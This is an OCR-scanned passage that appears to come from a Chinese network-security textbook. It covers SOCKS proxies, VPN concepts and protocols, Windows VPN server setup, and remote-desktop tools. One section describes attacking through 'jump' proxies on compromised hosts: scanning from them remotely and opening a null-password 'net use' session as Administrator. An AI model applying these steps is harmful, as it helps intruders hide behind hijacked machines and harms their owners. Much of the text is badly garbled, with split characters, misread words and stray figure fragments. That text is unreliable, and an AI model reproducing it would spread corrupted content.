和 密码 , 则 可 选中 * 用 户 名 /密码 ” 复 选 框 。 








teen le ME 
Socks 设置 | 直接 过 搞 | 昌 志 | 
型 手 合 seos RH 这 和 使 有 bj 通信 














服务 器 
Socks 服务 器: [220 47 7.27 端 [ao 
协议 
个 Socks 版 本 4(4) 
雹 socksCap 控制 台 ESES Socks 用 户 标 “inistator 
从 Socks 版 本 565) 























BR 





取消 应 用 内 


6-11 Socks 代理 添加 应 用 程序 图 6-12 Socks 代理 的 设置 











(2) 选择 图 6-12 中 的 “直接 连接 ”选项 卡 , 添 加 直接 连接 的 IP 地 址 或 域名 。 也 可 通过 IP 
地 址 文件 来 添加 。 

(3) 添加 直接 连接 的 应 用 程序 。 在 “Socks 版 本 5 直接 连接 的 UDP 端口 ?选项 组 中 可 设 
置 直接 连接 的 UDP 端口 号 ,如 图 6-13 所 示 。 

(4) 设置 日 志 信 息 。 在 设置 代理 选项 卡 并 添加 代理 应 用 程序 后 ,在 应 用 程序 列表 中 选 
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取 运 行 的 应 用 程序 ,选择 “文件 ”一 “通过 Socks 代理 ER 
运行 "命令 , 即 可 启动 该 应 用 程序 并 通过 代理 进行 登 | sows es mmsn|Bs | 
录 。 如 果 需 要 使 某 个 应 用 程序 通过 SocksCap32 代 5 
理 , 则 必须 通过 SocksCap32 进行 启动 。 


j* 6.2.5 用 远程 跳板 代理 进行 攻击 添加 直接 连 拉 的 ..。 [区 ] 


要 添加 的 端口 
本 
是 1. 扫描 选择 目标 mW | | sm 


这 里 使 用 的 流光 软件 ,主要 推荐 理由 是 流光 可 = 
以 进行 远程 扫描 。 通 过 在 远程 “肉鸡 ”上 安装 该 工 
具 , 就 可 以 轻易 实现 远程 的 跳板 式 扫 描 。 该 软件 可 
用 搜索 引擎 搜索 后 下 载 。 

















确定 取消 掺 用 AY 


2. 代理 跳板 的 架设 图 6-13 添加 UDP 端口 


代理 架设 的 方法 很 简单 ,具体 操作 步 又 如 下 。 

(1) 通过 3389 远程 登录 自己 的 “肉鸡 ”, 进 入 命令 提示 符 窗口 。 

(2) 在 当前 命令 提示 符 下 输入 : net use\\192. 168. 0. 55/"" user:"Administrator" 命 
令 , 即 可 建立 空 连接 。 稍 等 片刻 ,就 会 显示 “命令 执行 成 功 ” 的 信息 。 


| 6.3 VPN 概述 及 原理 | VPN 概述 及 原理 


> 6.3.1 VPN 的 概念 和 类 型 


VPN(Virtual Private Network, 虚 拟 专用 网 络 ) 提 供 了 一 种 通过 公用 网 络 安 全 地 对 企业 
内 部 专用 网 络 进行 远程 访问 的 连接 方式 。 一 个 网 络 连接 通常 由 三 部 分 组 成 : 客户 机 ,传输 
介质 和 服务 器 。VPN 同样 也 由 这 三 部 分 组 成 ,不 同 的 是 VPN 连接 使 用 隧道 作为 传输 通道 ， 
这 个 隧道 是 建立 在 公共 网 络 或 专用 网 络 基 础 之 上 的 ,如 Internet 或 Intranet。 目 前 互联 网 上 
搜索 VPN 代理 比较 频繁 。 

虚拟 专用 网 络 的 功能 是 在 公用 网 络 上 建立 专用 网 络 , 进 行 加 密 通信 。 在 企业 网 络 中 有 
广泛 应 用 。VPN 网 关 通 过 对 数据 包 的 加 密 和 数据 包 目 标 地 址 的 转换 实现 远程 访问 。VPN 
有 多 种 分 类 方式 ,主要 是 按 协议 进行 分 类 。VPN 可 通过 服务 器 \ 硬 件 、 软 件 等 多 种 方式 实现 。 

根据 不 同 的 划分 标准 ,VPN 可 以 按 以 下 几 个 标准 进行 分 类 划分 。 


ww. 按 VPN 的 协议 分 类 


VPN 的 隧道 协议 主要 有 3 种 : PPTP、L2TP 和 IPSec。 其 中 ,PPTP 和 L2TP 工作 在 
OSI 模型 的 第 二 层 , 又 称 为 二 层 隧道 协议 ; IPSec 是 第 三 层 隧道 协议 ,也 是 最 常见 的 协议 。 
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L2TP 和 IPSec 配合 使 用 是 目前 性 能 最 好 、 应 用 最 广泛 的 一 种 。 


Ez: 按 VPN 的 应 用 分 类 


(1) Access VPN( 远 程 接 人 VPN): 客户 端 到 网 关 , 使 用 公 网 作为 骨干 网 在 设备 之 间 传 
输 VPN 的 数据 流量 。 

(2) Intranet VPN( 内 联网 VPN): 网 关 到 网 关 , 通 过 公司 的 网 络 架 构 连 接 来 自 同 公司 
的 资源 。 

(3) Extranet VPN( 外 联网 VPN): 与 合作 伙伴 企业 网 构成 Extranet, 将 一 个 公司 与 男 
一 个 公司 的 资源 进行 连接 。 





lls. 按 所 用 的 设备 类 型 进行 分 类 


网 络 设备 提供 商 针 对 不 同 客户 的 需求 ,开发 出 不 同 的 VPN 网 络 设备 ,主要 为 路 由 器 、 交 
换 机 和 防火 墙 。 

(1) 路 由 器 式 VPN: 路 由 器 式 VPN 部 署 较 容易 ,只 要 在 路 由 器 上 添加 VPN 服务 即 可 。 

(2) 交换 机 式 VPN: 主要 应 用 于 连接 用 户 较 少 的 VPN 网 络 。 

(3) 防火 墙 式 VPN: 防火 墙 式 VPN 是 最 常见 的 一 种 VPN 的 实现 方式 ,许多 厂商 都 提 
供 这 种 配置 类 型 。 


PP 6.3.2 VPN 的 主要 技术 


下 . 密码 技术 


密码 技术 是 VPN 的 核心 技术 。 为 了 保证 数据 在 传输 过 程 中 的 安全 性 ,不 被 非法 的 用 户 
窃取 或 算 改 ,一般 都 在 传输 之 前 进行 加 密 , 在 接收 方 再 对 其 进行 解密 。 密 码 技术 是 保证 数据 
安全 传输 的 关键 技术 ,以 密 钥 为 标准 ,可 将 密码 系统 分 为 单 钥 密 码 (又 称 为 对 称 密码 或 私 钥 
密码 ) 和 双 钥 密码 (又 称 为 非 对 称 密码 或 公 钥 密 码 ) 。 单 钥 密 码 的 特点 是 加 密 和 解密 都 使 用 
同一 个 密 钥 ,因此 , 单 钥 密码 体制 的 安全 性 就 是 密 钥 的 安全 。 其 优点 是 加 解密 速度 快 。 最 有 
影响 的 单 钥 密码 就 是 美国 国家 标准 局 颁布 的 DES 算法 (56 比特 密 钥 ) 。 而 3DES(112 比特 
密 钥 ) 被 认为 是 目前 不 可 破译 的 。 双 钥 密码 体制 下 ,加 密 密 钥 与 解密 密 钥 不 同 ,加 密 密 钥 公 
开 , 而 解密 密 钥 保密 , 相 比 单 钥 体 制 , 其 算法 复杂 且 加 密 速 度 慢 。 所 以 现在 的 VPN 大 都 采用 
单 钥 的 DES 和 3DES 作为 加 解密 的 主要 技术 ,而 以 公 钥 和 单 钥 的 混合 加 密 体制 ( 即 加 解密 采 
用 单 钥 密码 ,而 密 钥 传送 采用 双 钥 密码 ) 来 进行 网 络 上 密 钥 交换 和 管理 ,不 但 可 以 提高 传输 
速率 ,还 具有 良好 的 保密 功能 。 认 证 技术 可 以 防止 来 自 第 三 方 的 主动 攻击 。 一 般 用 户 和 设 
备 双方 在 交换 数据 之 前 , 先 核对 证 书 , 如 果 准 确 无 误 ,双方 才 开始 交换 数据 。 用 户 身份 认证 
最 常用 的 技术 是 用 户 名 和 密码 方式 。 而 设备 认证 则 需要 依赖 由 CA 所 颁发 的 电子 证 书 。 目 
前 主要 有 的 认证 方式 有 : 简单 口令 如 质询 握手 验证 协议 CHAP 和 密码 身份 验证 协议 PAP 
等 ; 动态 口令 如 动态 令 牌 和 X. 509 数字 证 书 等 。 简 单口 令 认证 方式 的 优点 是 实施 简单 、 技 
术 成 熟 . 互 操作 性 好 , 且 支 持 动态 地 加 载 VPN 设备 ,可 扩展 性 强 。 
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2 身份 验证 技术 


虚拟 专用 网 的 基本 功能 就 是 不 同 的 用 户 对 不 同 的 主机 或 服务 器 的 访问 权限 是 不 一 样 
的 。 由 VPN 服务 的 提供 者 与 最 终 网 络 信息 资源 的 提供 者 共同 来 协商 确定 特定 用 户 对 特定 
资源 的 访问 权限 ,以 此 实现 基于 用 户 的 细 粒 度 访 问 控制 ,以 实现 对 信息 资源 的 最 大 限度 的 保 
护 。 访 问 控制 策略 可 以 细 分 为 选择 性 访问 控制 和 强制 性 访问 控制 。 选 择 性 访问 控制 是 基于 
主体 或 主体 所 在 组 的 身份 ,一 般 被 内 置 于 许多 操作 系统 当中 。 强 制 性 访问 控制 是 基于 被 访 
问 信 息 的 敏感 性 。 


EB. 隧道 技术 


隧道 技术 的 具体 内 容 是 在 一 个 隧道 的 两 端 , 源 节 点 把 其 他 类 型 的 协议 包装 成 了 了 包 然 后 
发 送 到 Internet 上 传输 ,封装 的 过 程 是 创建 一 个 新 的 IP 包 ,而 把 原来 的 协议 包 当 作 新 IP 包 
的 载荷 数据 。 在 目标 节点 把 这 个 新 的 IP 头 去 掉 , 得 到 原始 的 IP 数据 包 。 还 可 以 反 向 利用 
这 种 技术 , 即 创建 其 他 协议 的 隧道 ,而 把 IP 包 封装 ,这 样 卫 包 就 可 以 在 非 IP 网 络 上 传输 。 
隧道 可 以 按照 隧道 发 起 点 位 置 , 划 分 为 自愿 隧道 和 强制 隧道 。 自 愿 隧道 由 用 户 或 客户 端 计 
算 机 通过 发 送 VPN 请 求 进行 配置 和 创建 ,此 时 ,客户 端 计算 机 作为 障 道 客户 方 成 为 隧道 的 
一 个 端点 。 强 制 隧道 由 支持 VPN 的 拨号 接 入 服务 器 配置 和 创建 ,此 时 ,用 户 端 计算 机 不 作 
为 隧道 端点 ,而 是 由 位 于 客户 计算 机 和 隧道 服务 器 之 间 的 远程 接 入 服务 器 作为 隧道 客户 端 ， 
成 为 隧道 的 一 个 端点 。 

隧道 协议 是 隧道 技术 的 核心 ,基于 不 同 的 隧道 协议 所 实现 的 VPN 是 不 同 的 。 隧 道 技 术 
可 以 分 为 以 第 二 层 或 第 三 层 隧 道 协议 为 基础 。 上 述 分 层 按照 开放 系统 互联 (OSI) 的 参考 模 
型 划分 。 第 二 层 隧道 协议 对 应 OSI 模型 中 的 数据 链 路 层 , 使 用 帧 作为 数据 交换 单位 。 主 要 
的 第 二 层 隧 道 协 议 有 PPTP(Point to Point Tunneling Protocol) 、L2TP(Layer 2 Tunneling 
Protocol) ,它们 都 是 将 数据 封装 在 PPTP 帧 中 通过 互联 网 发 送 。 第 三 层 隧 道 协议 对 应 OSI 
模型 中 的 网 络 层 , 它 使 用 包 作为 数据 交换 单位 。 常 见 的 第 三 层 隧 道 协 议 有 IPSec、GRE 和 
GTP ,都 是 将 IP 包 封装 在 附加 的 PP 包头 中 通过 IP 网 络 传送 。 

第 二 层 隧 道 协议 中 ,PPTP 将 PPP 帧 封装 在 IP 数据 包 中 ,通过 IP 网 络 如 Internet 及 其 
他 企业 内 网 Intranet 等 发 送 。 通 过 PPTP ,远程 用 户 可 以 通过 操作 系统 ,以 及 其 他 支持 点 对 
点 协议 (PPP) 的 系统 拨号 连接 到 Internet 服务 提供 者 (ISP) ,然后 再 通过 Internet 与 它们 的 
公共 网 连接 。L2TP 协议 综合 了 PPTP 协议 及 L2F 协议 的 优点 , 且 支 持 多 路 隧道 ,这 样 可 以 
使 用 户 同 时 访问 Internet 和 Intranet, 该 技术 是 目前 IETF 的 标准 ,可 以 让 用 户 从 客户 端 或 
访问 服务 器 端 发 起 VPN 连接 ,支持 封装 的 PPP 帧 在 IP、 帧 中 继 或 ATM 等 网 络 进行 传送 。 

第 三 层 隧 道 协议 中 ,各 种 网 络 协议 直接 被 装 和 隧道 协议 中 ,形成 的 数据 包 依靠 第 三 层 协 
议 进 行 传输 。 其 中 ,IPSec 已 经 成 为 在 卫 层 提 供 安全 保障 的 常用 方法 。IPSec 是 一 组 开放 的 
网 络 安全 协议 总 称 , 在 IP 层 提供 访问 控制 .数据 来 源 验 证 及 数据 流 分 类 加 密 等 服务 。IPSec 
包括 (AH) 和 保温 安全 封装 协议 (ESP) 两 个 安全 协议 。AH(Authentication Header) 是 报 文 
验证 头 协议 ,主要 提供 数据 来 源 验证 数据 完整 性 验证 等 功能 ; EPS(Encapsulating Security 
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Payload) 是 封装 安全 载荷 协议 , 除 具 有 AH 协议 的 功能 之 外 还 提供 对 IP 报 文 的 加 密 功 能 。 
IPSec 协议 是 一 个 应 用 广泛 、 开 放 的 VPN 安全 协议 , 它 提 供 如 何 使 敏感 数据 在 开放 的 网 络 
中 传输 的 安全 机 制 。 

第 二 层 隧 道 协议 和 第 三 层 隧道 协议 是 两 种 独立 的 隧道 协议 ,区 别 是 第 二 层 隧 道 协议 把 
数据 封装 到 PPP 帧 中 ,再 把 整个 数据 包装 人 隧道 协议 中 。 相 同 点 是 要 把 要 通过 各 自 的 隧道 
协议 封装 成 耳 包 ,在 网 络 上 传输 。 


14. 密 钥 管理 技术 


密 钥 管理 的 主要 任务 就 是 保证 在 开放 的 网 络 环境 中 安全 地 传递 密 钥 , 而 不 被 窃取 。 目 
前 密 钥 管理 的 协议 包括 ISAKMP、SKIP、MKMP 等 。Internet 密 钥 交换 协议 IKE 是 
Internet 安全 关联 和 密 钥 管 理 协议 ISAKMP 语言 来 定义 密 钥 的 交换 ,综合 了 Oakley 和 
SKEME 的 密 钥 交 换 方案 ,通过 协商 安全 策略 ,形成 各 自 的 验证 加 密 参 数 。IKE 交换 的 最 终 
目的 是 提供 一 个 通过 验证 的 密 钥 以 及 建立 在 双方 同意 基础 上 的 安全 服务 。SKIP 主要 是 利 
用 Diffie-Hellman 的 演算 法 则 ,在 网 络 上 传输 密 钥 。IKE 协议 是 目前 首选 的 密 钥 管理 标准 ， 
较 SKIP 而 言 , 其 主要 优势 在 于 定义 更 灵活 ,能 适应 不 同 的 加 密 密 钥 。IKE 协议 的 缺点 是 它 
虽然 提供 了 强大 的 主机 级 身份 认证 ,但 同时 却 只 能 支持 有 限 的 用 户 级 身份 认证 ,并 且 不 支持 
非 对 称 的 用 户 认证 。 


PP 6.3.3 VPN 的 主要 协议 


隧道 是 利用 一 种 协议 传输 另 一 种 协议 的 技术 , 即 用 隧道 协议 来 实现 VPN 功能。 为 创建 
隧道 , 障 道 的 客户 机 和 服务 器 必须 使 用 同样 的 隧道 协议 。 

(1) PPTP( 点 到 点 隧道 协议 ): 是 一 种 用 于 让 远程 用 户 拨号 连接 到 本 地 的 ISP, 通 过 因 
特 网 安全 远程 访问 公司 资源 的 新 型 技术 。 它 能 将 PPP( 点 到 点 协议 ) 帧 封装 成 IP 数据 包 , 以 
便 能 够 在 基于 IP 的 互联 网 上 进行 传输 。PPTP 使 用 TCP( 传 输 控制 协议 ) 连 接 的 创建 ,维护 
与 终止 隧道 ,并 使 用 GRE( 通 用 路 由 封装 ) 将 PPP 帧 封装 成 隧道 数据 。 被 封装 后 的 PPP 帧 
的 有 效 载荷 可 以 被 加 密 或 者 压缩 或 者 同时 被 加 密 与 压缩 。 

(2) L2TP: L2TP 是 PPTP 与 L2F( 第 二 层 转 发 ) 的 一 种 综合 , 它 是 由 思科 公司 所 推出 
的 一 种 技术 。 

(3) IPSec 协议 : 是 一 个 标准 的 第 三 层 安 全 协议 , 它 是 在 隧道 外 面 再 封装 ,保证 了 在 传输 
过 程 中 的 安全 。IPSec 的 主要 特征 在 于 它 可 以 对 所 有 IP 级 的 通信 进行 加 密 。 


6.4 VPN 服务 器 的 配置 实例 


Li 免费 VPN 工具 赛 风 的 使 用 
赛 风 是 赛 风 公司 的 一 款 新 翻 墙 工 具 , 利 用 VPN、SSH 和 HTTP 代理 软件 提供 未 经 审查 


—e® 











的 访问 互联 网 。 具 体操 作 步 又 如 下 。 
(1) 从 搜索 引擎 搜索 下 载 “ 赛 风 3 绿色 运行 ?软件 。 
(2) 在 Windows 操作 系统 中 运行 psiphon3. exe。 
运行 VPN 代理 成 功 后 ,如 图 6-14 所 示 。 


Prsiphon 3 
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6-14 ” 赛 风 VPN 代理 
单 击 “连接 中 断 ”按钮 . 则 停止 VPN 代理 。 


2. Windows Server 下 配置 VPN 服务 器 


赛 风 是 一 个 VPN 的 客户 端 ,同样 通过 Windows 中 的 新 建 网 络 连接 也 可 以 生成 一 个 
VPN 的 客户 端 。 客 户 端 相 对 服务 器 端的 配置 相对 比较 简单 , 下面 将 在 Windows Server 系 
统 下 配置 一 个 VPN 的 服务 器 。 

具体 操作 步骤 如 下 。 

(1) 添加 组 件 * 路 由 和 远程 访问 ”, 在 管理 工具 中 运行 “路 由 和 远程 访问 ”服务 。 

(2) 右 击 计算 机 名 ,选择 “配置 并 启动 路 由 和 远程 访问 ?选项 。 

(3) 打开 路 由 和 远程 访问 服务 器 安装 向 导 , 一 般 单 网 卡 的 服务 器 , 则 选择 “ 自 定义 配置 ?功能 。 

(4) 选择 相应 的 服务 ,如 图 6-15 所 示 。 完 成 配置 后 ,选择 “开始 服务 ”选项 。 

(5) 在 运行 服务 的 路 由 和 访问 上 右 击 ,在 弹出 的 快捷 菜单 中 ,选择 “属性 ”命令 ,如 
图 6-16 所 示 。 
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图 6-15 配置 路 由 访问 服务 








图 6-16 配置 路 由 访问 服务 的 属性 
(6) 按 图 6-17 所 示 步 又 ,配置 静态 地 址 池 。 


EASTCOAST1165 (本 地 ) 屋 性 





图 6-17 配置 路 由 访问 服务 的 卫 








图 6-18 配置 路 由 访问 服务 的 NAT 


(8) 在 Windows 中 新 建 允许 VPN 连接 的 新 用 户 test, 如 图 6-19 所 示 。 
(9) 用 客户 端 测试 连接 。 





图 6-19 配置 允许 VPN 连接 的 用 户 


(EEC 远程 控制 工具 


对 于 网 络 攻击 者 来 说 ,能 够 通过 网 络 直接 远程 控制 另 一 台 计 算 机 才 是 最 终 目 的 ,一 旦 获 
取 了 远程 操作 界面 ,并 具有 足够 的 权限 ,理论 上 就 等 于 掌握 了 受害 计算 机 的 所 有 资源 ,并 能 
够 以 此 为 跳板 展开 进一步 的 渗透 攻击 。 当 然 .黑客 攻击 前 一 般 要 利用 代理 等 隐藏 自己 的 IP 
或 远程 控制 肉鸡 进行 攻击 。 对 于 网 络 管理 员 来 说 ,能 够 通过 网 络 进行 远程 控制 也 能 非常 方 
便 地 管理 和 维护 网 络 。 
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计算 机 都 是 由 操作 系统 统一 管理 各 种 软 硬 件 资源 的 ,用 户 使 用 计算 机 需要 通过 由 操作 
系统 提供 的 某 个 Shell( 外 壳 ) 界 面 才能 将 键盘 和 鼠标 等 设备 发 出 的 命令 传递 到 操作 系统 内 
部 去 执行 。 既 有 类 似 于 DOS 的 命令 行 操作 界面 的 Shell, 也 有 像 Windows 的 图 形 化 Shell 
界面 。 

在 网 络 时 代 , 不 仅 需要 在 本 地 操作 计算 机 ,还 出 现 了 远程 操作 计算 机 的 需求 ,例如 在 实 
际 生活 中 ,网 络 管理 员 不 是 总 能 及 时 赶 到 被 管理 的 计算 机 所 在 地 ,也 不 可 能 整 天 守 在 机 房 里 
面 ,所 以 为 了 方便 管理 ,需要 一 种 让 管理 员 能 够 通过 网 络 (LAN 或 WAN) ,摆脱 地 理 位 置 的 
限制 ,在 远 处 间接 控制 管理 计算 机 的 工具 , 即 远程 控制 软件 。 

远程 控制 软件 一 般 分 客户 端 和 服务 端 程序 两 部 分 ,通常 将 客户 端 程序 安装 到 主 控 端 的 
计算 机 上 ,将 服务 端的 程序 安装 到 被 控 端 的 计算 机 上 。 使 用 时 建立 一 个 特殊 的 远程 服务 , 然 
后 通过 这 个 远程 服务 ,使 用 各 种 远程 控制 功能 发 送 远程 控制 命令 ,控制 被 控 计 算 机 中 各 种 程 

可 以 将 远程 控制 工具 简单 地 分 为 3 类 : 命令 行 控制 类 工具 、 图 形 界面 远程 控制 工具 和 
木马 控制 类 工具 。 

木马 控制 类 工具 一 般 有 灰 饮 子 。 和 正常 远程 控制 工具 相 比 ,木马 类 的 工具 控制 受害 计 
算 机 后 ,被 控 计 算 机 用 户 是 很 难 觉察 到 受 控 的 。 而 命令 行 控 制 类 工具 主要 有 Telnet 远程 控 
制 和 SSH(Secure Shell) 远 程控 制 两 种 。SSH 需要 守护 服务 端 进程 ,一 般 是 sshd 进程 ,默认 
情况 下 工作 在 22 号 端口 , 它 在 后 台 运行 并 响应 来 自 客户 端的 连接 请 求 。 服 务 端 提供 了 对 远 
程 连接 的 处 理 ,一 般 包 括 公共 密 钥 认证 、 密 钥 交换 和 加 密 等 功能 。 可 以 使 用 专门 的 SSH 客 
户 端 工具 安全 登录 到 配置 好 SSH 服务 端的 计算 机 ,例如 开源 的 putty 程序 。 

以 下 主要 介绍 几 种 图 形 界面 远程 控制 工具 的 使 用 。 


下 . Windows 系统 自 带 “远程 桌面 "的 使 用 


Windows XP 和 Windows Server 2003 及 更 新 的 Windows 操作 系统 都 内 置 了 远程 桌面 
连接 服务 端 功 能 ,设置 一 下 就 可 以 使 用 。 具 体操 作 步 又 如 下 。 

(1) 在 “控制 面板 ”中 双击 “系统 ”选项 ,或 右 击 “ 我 的 电脑 ”, 在 弹出 的 快捷 菜单 中 ,选择 
“属性 ”命令 ,打开 “系统 属性 ”对 话 框 ,然后 选择 “远程 ”选项 卡 , 如 图 6-20 所 示 。 选 中 “允许 
远程 协助 连接 这 台 计 算 机 " 复 选 框 。 

(2) 由 于 远程 访问 有 一 定 的 风险 ,所 以 一 定 要 设置 好 服务 器 用 户 的 权限 。 在 图 6-20 中 ， 
单 击 “ 选 择 用 户 ” 按 钮 ,建立 远程 访问 用 户 。 

(3) 在 默认 的 情况 下 ,远程 桌面 服务 端口 是 3389, 可 以 用 net stat -an 命令 查看 。 当 然 
为 了 安全 方面 的 考虑 ,可 以 修改 默认 端口 。 

(4) 在 客户 端 计算 机 连接 到 远程 桌面 。 选 择 * 开 始 一 “附件 ”一 “远程 桌面 连接 ”命令 ， 
也 可 以 直接 运行 命令 mstsc, 在 打开 的 “远程 桌面 连接 ”对 话 框 中 ,可 以 设置 更 多 连接 选项 ,如 





图 6-21 所 示 。 
在 图 6-21 中 ,修改 3389 端口 为 3633 端口 ,已 经 保存 了 登录 凭据 。 选 项 中 一 般 还 要 设置 
的 选项 如 下 。 
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用 户 名 : arFCVturbo 




































































单 击 一 个 选项 ,然后 指定 谁 可 以 连接 (如果 需 要 )。 tt 可 以 编辑 或 而 际 这 
允许 连接 到 这 各 计算 机 O) 后 多 江 
因 不 允许 连接 到 这 各 计算 机 回 抬 终 要 求 扣 提 
图 允许 运行 任意 版 本 远程 桌面 的 计算 机 连接 咳 不 安全 ) (1) 
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© 人 ) 报 当 W 披 设 村 分 到 了 DP 文件 或 打开 一 个 已 保存 的 连 
CE Ca CE -dniahed Cw 








图 6-20 开启 远程 桌面 图 6-21 “远程 桌面 连接 ”对话 框 


@ 在 “显示 ”选项 卡 中 ,可 以 设置 远程 桌面 的 大 小 ,如 可 以 设置 为 全 屏 状态 ; 设置 远程 会 
话 连接 显示 的 质量 ,如 可 以 设置 * 真 彩色 24 位 ?等 。 

@ 在 “本 地 资源 ”选项 卡 中 ,如 图 6-22 所 示 , 可 以 设置 远程 音频 .键盘 及 本 地 设备 和 资 
源 。 如 要 进行 本 地 计算 机 和 远程 计算 机 之 间 的 文件 复制 , 则 要 在 “本 地 设备 和 资源 "中 选择 
本 地 “驱动 器 " 复 选 框 。 
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选择 要 在 远程 会 话 中 使 用 的 这 台 计 算 机 上 的 设备 和 资源 。 


















国 智 能 卡 人 0 
回 端 D &) 


回 驱 动 器 
国 其 他 支持 的 即 插 即 用 PP) 设备 


















































图 6-22 “远程 桌面 连接 ?设置 本 地 资源 
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(5) 远程 桌面 连接 在 无 路 由 设备 限制 条 件 下 ,内 网 可 以 直 连 访问 外 网 ,外 网 不 能 直接 连 
接 内 网 地 址 。 另 外 ,远程 桌面 微软 公司 还 提供 了 APP 方式 的 客户 端 (Microsoft 远程 桌面 一 
RD Client) 连 接 , 可 以 用 手机 远程 到 服务 器 。 


有 2: 远程 工具 “向 日 英 " 的 使 用 


向 日 葵 是 一 款 阳光 、 绿 色 的 面向 企业 和 专业 人 员 的 远程 PC 管理 和 控制 的 服务 软件 。 在 
任何 可 连 人 互联 网 的 地 点 ,都 可 以 轻松 访问 和 控制 安装 了 向 日 葵 远 程控 制 客户 端的 远程 主 
机 ,整个 过 程 完 全 可 以 通过 浏览 器 进行 ,无 须 再 安装 软件 。 

向 日 葵 远 程控 制 拥有 5 秒 快 速 而 又 强劲 的 内 网 穿 透 功力 ,融合 了 微软 RDP 远程 桌面 
(3389) ,用 户 可 以 轻松 在 向 日 荃 远程 桌面 协议 和 微软 RDP 协议 中 自由 切换 ,享受 最 佳 的 远 
程 桌面 体验 。 该 软件 的 主要 优势 如 下 。 

(1) 跨 平 台 , 跨 网 络 。 打 破 平台 障碍 ,支持 Windows、Linux、MAC.iOS、Android, 强 大 
内 网 穿 透 能 力 , 可 穿 透 各 种 防火 墙 。 

(2) 随时 随地 ,远程 开机 。 搭 配 向 日 葵 开 机 棒 , 可 通过 向 日 葵 远 程 轻松 开启 数 百 台 主 
机 。2012 年 6 月, 向日葵 与 芯片 巨 鲍 高 通达 成 战略 协议 ,主流 计算 机 设备 直接 支持 向 日 著 远 
程 开机 (联想 与 技嘉 多 系列 主板 ) 。 

(3) 极速 流畅 ,远程 桌面 。 可 实时 查看 和 控制 远程 主机 ,享受 到 极速 流畅 的 体验 ,同时 
完美 实现 多 屏 查 看 功能 。 

(4) 远程 文件 ,双向 传输 。 随 时 随地 与 远程 计算 机 双向 传输 文件 ,轻松 实现 远程 资源 共享 。 

(5) 远程 诊断 ,配置 .CMD。 无 处 不 在 的 远程 管理 模式 ,只 要 在 能 连 和 人 互联 网 的 地 方 , 就 
可 以 轻松 管理 自己 的 远程 主机 ,进行 远程 诊断 .远程 配置 .CMD 多 样 化 远程 控制 等 ,如 同 亲 
临 现场 , 帮 家 人 、 朋 友 商业 伙伴 迅速 解决 计算 机 问题 。 

(6) 支持 多 摄像 头 、 话 简 。 支 持 PC 摄像 头 、 网 络 摄像 头 、. 话 简 , 全 方位 远程 巡逻 ,一切 尽 
在 掌握 中 。 

(7) 三 步 快速 搭建 VPN。 三 步 完 成 ,最 简单 的 VPN 搭建 工具 。 

(8) 开放 API, 软 硬件 嵌入 。 开 放 API, 支 持 软 硬件 岩 入 。 

硬件 : 与 高 通达 成 远程 开机 芯片 级 嵌入 ; 与 安 霸 达成 网 络 摄像 头 芯片 级 典 入 。 

软件 : 税 友 、 图 度 ,协助 软件 完成 远程 功能 模块 的 实现 。 

具体 操作 步骤 如 下 。 

(1) 在 其 官方 网 站 (http://sunlogin. oray. com) 上 下 载 相应 操作 系统 的 安装 文件 。 要 
注意 下 载 的 是 客户 端 文件 还 是 主 控 端 文件 。 运 行 客户 端 安装 文件 后 ,如 图 6-23 所 示 , 要 选 
择 启 动向 日 比 软 件 客户 端的 方式 。 客 户 端 支持 控制 和 被 控制 两 个 角色 。 一 般 简单 的 远程 访 
问 控制 ,不 需要 安装 主 控 端 程序 。 

(2) 客户 端 安装 完成 后 ,会 有 使 用 帮助 提示 ,如 图 6-24、 图 6-25 所 示 。 

(3) 在 客户 端 输入 要 控制 的 计算 机 的 识别 码 (双方 都 同时 安装 客户 端 程序 ) ,如 图 6-26 
所 示 , 单 击 “远程 协助 ”按钮 。 

(4) 等 待 被 控 方 接受 ,输入 验证 码 进行 验证 ,如 图 6-27 所 示 。 
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图 6-23 向 日 葵 客 户 端 安装 程序 





允许 控制 本 机 or 控制 伙伴 ， 两 者 兼备 

















点 击 可 切换 到 无 人 值守 页 面 将 识别 码 告知 伙伴 ， 让 他 控制 本 机 
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输入 伙伴 识别 码 ， 可 控制 伙伴 的 计算 机 














图 6-24 向 日 葵 客 户 端 使 用 帮助 1 


(5) 连接 成 功 后 ,如 图 6-28 所 示 ,可 以 进行 远程 桌面 的 设置 和 操作 。 如 在 “更 多 ”中 选择 
发 送 “Ctrl 十 Alt 十 Delete” 命 令 ,传送 文件 等 操作 。 

(6) 安装 主 控 端 程序 后 ,如 图 6-29 所 示 , 可 以 进行 注册 或 登录 到 账户 。 或 者 可 以 直接 
“发 起 快速 远 控 ”功能 和 客户 端 程序 一 样 。 

(7) 主 控 端 登录 后 , 主 界面 如 图 6-30 所 示 。 在 客户 端 程序 ,可 以 设置 绑 定 到 账户 ,这 样 
网 络 管理 员 可 以 通过 主 控 端 程序 ,方便 地 远程 控制 多 台 相 关联 的 受 控 主机 。 在 “在 线 ?选项 
中 选择 受 控 主机 , 右 击 可 以 快速 地 进行 “屏幕 查看 “远程 桌面 “远程 文件 ”等 操作 。 
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绑 定 账号 后 ， 允 许 无 人 值守 的 远 控 ,从 控制 端 一 键 访问 














图 6-25 向 日 葵 客 户 端 使 用 帮助 2 





本 机 识别 码 : 922 450 649 aaa? 
允许 入 制 本 机 ， 请 发 送 识别 玛 给 伙伴 
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上 3. 其 他 远程 控制 工具 


常用 的 远程 控制 工具 有 很 多 ,如 PCAnywhere、RAdmin 等 很 优秀 的 远程 控制 软件 ,也 有 
很 多 的 用 户 。 平 时 的 工作 中 ,常用 的 工具 ,一 定 不 会 忘记 了 QQ 软件 , QQ 远程 控制 的 使 用 
频率 也 是 十 分 高 的 。 另 外 ,还 有 一 个 使 用 较 多 的 软件 TeamViewer, 它 是 一 个 能 在 任何 防火 
墙 和 NAT 代理 的 后 台 用 于 远程 控制 .桌面 共享 和 文件 传输 的 简单 且 快 速 的 解决 方案 。 为 了 
连接 到 另 一 台 计算 机 ,只 需要 在 两 台 计 算 机 上 同时 运行 TeamViewer 即 可 ,而 不 需要 进行 安 
装 ( 也 可 以 选择 安装 ,安装 后 可 以 设置 开机 运行 )。 该 软件 第 一 次 启动 在 两 台 计 算 机 上 自动 
生成 伙伴 ID。 只 需要 输入 伙伴 的 ID 到 TeamViewer, 然 后 就 会 立即 建立 起 连接 。 
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图 6-27 向 日 葵 远 程 连接 的 验证 


按 Ctrl + Alt + Delete 登 录 


WW: Windows Server 208 
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图 6-29 向 日 葵 主 控 端 登录 界面 图 6-30 向 日 葵 主 控 端 主 界面 


